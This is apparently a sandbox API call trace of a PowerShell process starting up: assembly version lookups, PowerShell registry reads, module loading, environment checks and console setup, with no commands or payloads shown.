[0072.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.257] SetErrorMode (uMode=0x1) returned 0x1
[0072.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10d680 | out: lpFileInformation=0x10d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0072.257] SetErrorMode (uMode=0x1) returned 0x1
[0072.257] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10d8f0 | out: lpdwHandle=0x10d8f0) returned 0x94c
[0072.258] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c23778 | out: lpData=0x2c23778) returned 1
[0072.258] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d868, puLen=0x10d860 | out: lplpBuffer=0x10d868*=0x2c23814, puLen=0x10d860) returned 1
[0072.258] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c238f0, puLen=0x10d7d0) returned 1
[0072.258] lstrlenW (lpString="Microsoft Corporation") returned 21
[0072.258] CoTaskMemAlloc (cb=0x2e) returned 0x214940
[0072.259] lstrcpyW (in: lpString1=0x214940, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0072.259] CoTaskMemFree (pv=0x214940)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c23944, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="System.Management.Automation") returned 28
[0072.259] CoTaskMemAlloc (cb=0x3c) returned 0x215cd0
[0072.259] lstrcpyW (in: lpString1=0x215cd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0072.259] CoTaskMemFree (pv=0x215cd0)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c239a0, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.259] CoTaskMemAlloc (cb=0x20) returned 0x21b3e0
[0072.259] lstrcpyW (in: lpString1=0x21b3e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.259] CoTaskMemFree (pv=0x21b3e0)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c239e0, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.259] CoTaskMemAlloc (cb=0x44) returned 0x215cd0
[0072.259] lstrcpyW (in: lpString1=0x215cd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.259] CoTaskMemFree (pv=0x215cd0)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c23a48, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0072.259] CoTaskMemAlloc (cb=0x76) returned 0x1beb60
[0072.259] lstrcpyW (in: lpString1=0x1beb60, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0072.259] CoTaskMemFree (pv=0x1beb60)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c23ae4, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0072.259] CoTaskMemAlloc (cb=0x44) returned 0x215cd0
[0072.259] lstrcpyW (in: lpString1=0x215cd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0072.259] CoTaskMemFree (pv=0x215cd0)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c23b48, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0072.259] CoTaskMemAlloc (cb=0x58) returned 0x204f00
[0072.259] lstrcpyW (in: lpString1=0x204f00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0072.259] CoTaskMemFree (pv=0x204f00)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c23bc4, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="6.1.7601.17514") returned 14
[0072.259] CoTaskMemAlloc (cb=0x20) returned 0x21b3e0
[0072.259] lstrcpyW (in: lpString1=0x21b3e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0072.259] CoTaskMemFree (pv=0x21b3e0)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x2c2386c, puLen=0x10d7d0) returned 1
[0072.259] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0072.259] CoTaskMemAlloc (cb=0x66) returned 0x19cd10
[0072.259] lstrcpyW (in: lpString1=0x19cd10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0072.259] CoTaskMemFree (pv=0x19cd10)
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x0, puLen=0x10d7d0) returned 0
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x0, puLen=0x10d7d0) returned 0
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10d7d8, puLen=0x10d7d0 | out: lplpBuffer=0x10d7d8*=0x0, puLen=0x10d7d0) returned 0
[0072.259] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d7a8, puLen=0x10d7a0 | out: lplpBuffer=0x10d7a8*=0x2c23814, puLen=0x10d7a0) returned 1
[0072.259] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0072.259] VerLanguageNameW (in: wLang=0x0, szLang=0x1c3c90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0072.260] CoTaskMemFree (pv=0x1c3c90)
[0072.260] VerQueryValueW (in: pBlock=0x2c23778, lpSubBlock="\\", lplpBuffer=0x10d7f8, puLen=0x10d7f0 | out: lplpBuffer=0x10d7f8*=0x2c237a0, puLen=0x10d7f0) returned 1
[0072.264] CoTaskMemAlloc (cb=0x104) returned 0x21ec90
[0072.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.264] CoTaskMemFree (pv=0x21ec90)
[0072.303] CoTaskMemAlloc (cb=0x104) returned 0x21ec90
[0072.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21ec90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.304] CoTaskMemFree (pv=0x21ec90)
[0072.306] lstrlenW (lpString="䅁") returned 1
[0072.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6c8 | out: phkResult=0x10d6c8*=0x308) returned 0x0
[0072.314] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6b8 | out: phkResult=0x10d6b8*=0x30c) returned 0x0
[0072.314] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d748 | out: phkResult=0x10d748*=0x310) returned 0x0
[0072.316] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d68c, lpData=0x0, lpcbData=0x10d688*=0x0 | out: lpType=0x10d68c*=0x1, lpData=0x0, lpcbData=0x10d688*=0x56) returned 0x0
[0072.317] CoTaskMemAlloc (cb=0x5a) returned 0x219f10
[0072.317] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d65c, lpData=0x219f10, lpcbData=0x10d658*=0x56 | out: lpType=0x10d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d658*=0x56) returned 0x0
[0072.317] CoTaskMemFree (pv=0x219f10)
[0072.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.388] CoTaskMemAlloc (cb=0x104) returned 0x21fc90
[0072.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x21fc90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.388] CoTaskMemFree (pv=0x21fc90)
[0072.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.932] CoTaskMemAlloc (cb=0x104) returned 0x229b60
[0072.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b60, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.932] CoTaskMemFree (pv=0x229b60)
[0072.938] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0072.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.971] CoTaskMemFree (pv=0x229b90)
[0073.034] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0073.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.034] CoTaskMemFree (pv=0x229b90)
[0073.105] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0073.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.105] CoTaskMemFree (pv=0x229b90)
[0073.105] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0073.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.105] CoTaskMemFree (pv=0x229b90)
[0073.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.334] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0073.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.334] CoTaskMemFree (pv=0x229b90)
[0073.369] CoTaskMemAlloc (cb=0x104) returned 0x229b90
[0073.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229b90, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.370] CoTaskMemFree (pv=0x229b90)
[0073.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0073.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0074.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0074.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0075.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0075.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0075.591] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0075.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0075.591] CoTaskMemFree (pv=0x229db0)
[0075.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", nBufferLength=0x105, lpBuffer=0x10d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", lpFilePart=0x0) returned 0x3c
[0075.738] SetErrorMode (uMode=0x1) returned 0x1
[0075.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x10d620 | out: lpFileInformation=0x10d620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0075.738] SetErrorMode (uMode=0x1) returned 0x1
[0076.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.738] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.738] CoTaskMemFree (pv=0x229db0)
[0076.757] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.757] CoTaskMemFree (pv=0x229db0)
[0076.757] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.757] CoTaskMemFree (pv=0x229db0)
[0076.780] CoCreateGuid (in: pguid=0x10d9e8 | out: pguid=0x10d9e8*(Data1=0xb6ca3918, Data2=0x35dd, Data3=0x423c, Data4=([0]=0x97, [1]=0xf1, [2]=0xad, [3]=0x72, [4]=0x5d, [5]=0xce, [6]=0xaa, [7]=0x1e))) returned 0x0
[0076.796] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.796] CoTaskMemFree (pv=0x229db0)
[0076.798] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.798] CoTaskMemFree (pv=0x229db0)
[0076.836] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0076.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.836] CoTaskMemFree (pv=0x229db0)
[0076.840] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
[0076.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10d690 | out: lpConsoleScreenBufferInfo=0x10d690) returned 1
[0076.844] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
[0076.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d690 | out: lpConsoleScreenBufferInfo=0x10d690) returned 1
